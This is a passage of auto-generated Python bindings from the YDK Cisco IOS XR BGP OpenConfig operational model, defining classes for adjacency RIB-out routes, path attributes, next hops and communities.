.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-out-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost']['meta_info']
class AdjRibOutPre(_Entity_):
"""
Adjacency rib out\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, self).__init__()
self.yang_name = "adj-rib-out-pre"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-out-pre"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-out-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
